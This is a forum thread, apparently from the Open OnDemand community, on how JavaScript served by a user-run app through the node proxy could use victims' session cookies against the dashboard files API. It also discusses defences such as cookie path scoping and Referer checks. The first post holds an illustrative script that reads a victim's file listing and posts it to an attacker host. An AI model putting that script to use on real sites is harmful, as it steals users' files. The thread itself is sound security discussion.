Preventing a JS Attack?

Inspired by this issue, I’ve been thinking about OnDemand’s security measures. Specifically, I’m worried about a scenario where a malicious or compromised user with access to OnDemand starts a web server serving user-defined content, for example a Python or R Shiny web server. That server is accessible to anyone logged into OnDemand via a link such as https://ondemand.my_center.edu/rnode/node02.my_center.edu/5000/index.html. Malicious JavaScript served by this HTML page could then make authenticated requests to the OnDemand API, in much the same way the files dashboard uses API requests to move/edit/delete files. This would give the attacker full control over the files of any user who has authenticated with OnDemand and then clicked the link, which is a very low threshold.
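
To make this concrete, here’s a rough sketch of the kind of script such a page could serve. The endpoint path and the attacker host below are made-up for illustration (I don’t know the dashboard’s exact files API), but the key point is that a same-origin fetch rides on the victim’s existing session cookies:

```typescript
// Illustrative payload on the proxied page. The endpoint path and the
// attacker host are made-up assumptions, not the real OnDemand files API.
async function raidVictimFiles(): Promise<void> {
  // Same-origin request: the browser attaches the victim's OnDemand
  // session cookies by default, so this arrives fully authenticated.
  const resp = await fetch("/pun/sys/dashboard/files/fs/home/victim", {
    credentials: "include", // explicit, though same-origin is the default
  });
  const listing = await resp.text();

  // Ship whatever came back off to an attacker-controlled host.
  await fetch("https://attacker.example.com/collect", {
    method: "POST",
    mode: "no-cors",
    body: listing,
  });
}

void raidVictimFiles();
```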

This was already discussed in the context of the HTML content serving behaviour that OnDemand previously had (see the link above), but this isn’t the only way for OnDemand to serve user content, hence my concern.

Does OnDemand have any security measures to prevent this happening?

Not really, other than disabling user sharing.

That link came from an app. Let’s say it’s actually good (i.e., not malicious) like RStudio. RStudio’s going to serve up some JavaScript that is required for the app, so we have to forward that - otherwise it’s basically useless.

Now there could be a scheme where an app generates a link that one and only one user can access. This is something I’d like to move to, but it requires a very large overhaul of how we currently proxy. But even then, the app could be malicious. That’s where user sharing comes in. If you only expose apps that the system administrator installed (i.e., a trusted source), then you can mitigate that. But if you’ve enabled any user to share any app, well then, you have to trust all those users.

I think in general - you just don’t want to click links that people give you. Always click the button in the OnDemand interface and you’ll get routed to your app that was provided by the system administrator.

Just wanted to add that we are always open to ideas / suggestions. Fundamentally, there are a TON of potential attack vectors on a typical research computing system because clients inherently expect to be able to collaborate with other people in their group, move data around, and run software / scripts they personally haven’t developed.

Since Open OnDemand relies almost entirely on the underlying operating system for most security stuff, a lot of these types of issues are present regardless of whether OOD is installed or not. For example, lots of sites run JupyterLab standalone. Someone could easily provide a malicious Python script that, once people inadvertently execute it, moves/edits/deletes their files.

Okay so it turns out I’m describing an XSS attack.

Could we restrict the scope of the OnDemand cookies? For example, when you log in to OnDemand, I believe it sets cookies with Path=/, meaning they can be used anywhere within ondemand.example.edu.au. If we granted different cookies to the node proxy URLs (ondemand.example.edu.au/rnode) and the dashboard (ondemand.example.edu.au/pun/sys/dashboard/files), so that the interactive apps couldn’t use the privileged OnDemand cookies, this would avoid the issue from our end.
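
As a very rough sketch of the mechanics I’m imagining (the cookie names/values and the little Node server are entirely hypothetical, not how OnDemand actually manages sessions):

```typescript
import { createServer, ServerResponse } from "node:http";

// Illustrative only: the cookie names/values and this Node server are made
// up; OnDemand's real session handling is not implemented like this. The
// point is the Path attribute on each cookie. (Caveat: Path controls which
// request URLs a cookie is attached to, not which page initiated the
// request, so this would likely need to be combined with other checks.)
function setScopedCookies(res: ServerResponse): void {
  res.setHeader("Set-Cookie", [
    // Privileged session cookie, only sent with dashboard/API requests.
    "ood_dashboard_session=abc123; Path=/pun; Secure; HttpOnly; SameSite=Lax",
    // Separate, unprivileged cookie for the interactive-app proxy paths.
    "ood_proxy_session=def456; Path=/rnode; Secure; HttpOnly; SameSite=Lax",
  ]);
}

createServer((_req, res) => {
  setScopedCookies(res);
  res.end("cookies set\n");
}).listen(3000);
```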

Alternatively, could the “dangerous” OnDemand backend APIs such as the file manipulation ones enforce that the origin of the request is the dashboard and not an interactive app?
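
To sketch what I mean (purely illustrative, not existing OnDemand code): since the dashboard and the proxied apps share one origin, the Origin header would look the same for both, so a guard like this would have to look at the Referer path instead.

```typescript
import type { IncomingMessage, ServerResponse } from "node:http";

// Hypothetical guard for "dangerous" endpoints (file move/edit/delete).
// The dashboard and the proxied apps share one origin, so the Origin header
// is identical for both; this checks the Referer *path* instead. The prefix
// and the wiring are assumptions, not existing OnDemand code.
const DASHBOARD_PREFIX = "/pun/sys/dashboard";

function cameFromDashboard(req: IncomingMessage): boolean {
  const referer = req.headers.referer;
  if (!referer) return false; // no Referer at all: reject by default
  try {
    return new URL(referer).pathname.startsWith(DASHBOARD_PREFIX);
  } catch {
    return false; // malformed Referer
  }
}

// Call this before acting on any state-changing files request.
function rejectIfNotDashboard(req: IncomingMessage, res: ServerResponse): boolean {
  if (cameFromDashboard(req)) return false;
  res.statusCode = 403;
  res.end("Forbidden: request did not originate from the dashboard\n");
  return true;
}
```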

Now there could be a scheme where an app generates a link that one and only one user can access. This is something I’d like to move to, but it requires a very large overhaul of how we currently proxy.

This would also work, but limiting the sharing might break some use cases.

Since Open OnDemand relies almost entirely on the underlying operating system for most security stuff, a lot of these types of issues are present regardless of whether OOD is installed or not. For example, lots of sites run JupyterLab standalone. Someone could easily provide a malicious Python script that, once people inadvertently execute it, moves/edits/deletes their files.

I take your point, but I’m a bit less worried about those use cases. The reason is that whenever someone runs a script or Python notebook, the user is (or should be) aware that they’re running some code and that, like any code, it could be destructive. The issue I’m raising here is to do with XSS, which can happen without the user actively executing anything, because the browser will automatically fire off these requests as soon as you hit the page. I think people are less cautious about visiting a web page because it’s not generally as dangerous.